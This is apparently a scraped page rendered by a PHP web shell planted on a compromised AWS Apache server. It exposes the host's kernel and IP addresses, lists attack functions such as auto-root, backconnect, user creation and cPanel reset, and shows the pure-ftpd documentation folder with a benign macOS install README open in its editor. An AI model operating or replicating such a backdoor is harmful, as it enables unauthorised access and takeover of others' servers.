Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 13.59.56.153
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
pure-ftpd /
share /
doc /
pure-ftpd /
[ HOME SHELL ]
Name
Size
Permission
Action
FAQ
31.79
KB
-rw-r--r--
README.Authentication-Modules
4.65
KB
-rw-r--r--
README.Configuration-File
1.1
KB
-rw-r--r--
README.LDAP
10.14
KB
-rw-r--r--
README.MacOS-X
1004
B
-rw-r--r--
README.MySQL
8.93
KB
-rw-r--r--
README.PGSQL
8.21
KB
-rw-r--r--
README.TLS
10.81
KB
-rw-r--r--
README.Virtual-Users
11.81
KB
-rw-r--r--
pure-ftpd.conf
11.14
KB
-rw-r--r--
pureftpd-ldap.conf
1.96
KB
-rw-r--r--
pureftpd-mysql.conf
3.37
KB
-rw-r--r--
pureftpd-pgsql.conf
2.91
KB
-rw-r--r--
pureftpd.schema
2.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.MacOS-X
------------------------ OSX SPECIFIC NOTES ------------------------ The easiest way to install Pure-FTPd is to use Homebrew: $ brew install pure-ftpd Available options are: --with-mysql Build with mysql support --with-postgresql Build with postgresql support --with-virtualchroot Follow symbolic links even for chrooted accounts To get Pure-FTPd authenticate against system users on OSX, you have to use PAM. $ ./configure --with-pam <your other favorite options like --with-everything> $ make install-strip Create a /etc/pam.d/pure-ftpd file: # pure-ftpd: auth account password session auth required pam_opendirectory.so account required pam_permit.so password required pam_deny.so session required pam_permit.so Start the FTP server: $ /usr/local/sbin/pure-ftpd -lpam -B To take advantage of Bonjour, please add --with-bonjour to ./configure switches and give the server a Bonjour service name with the -v (--bonjour=) switch.
Close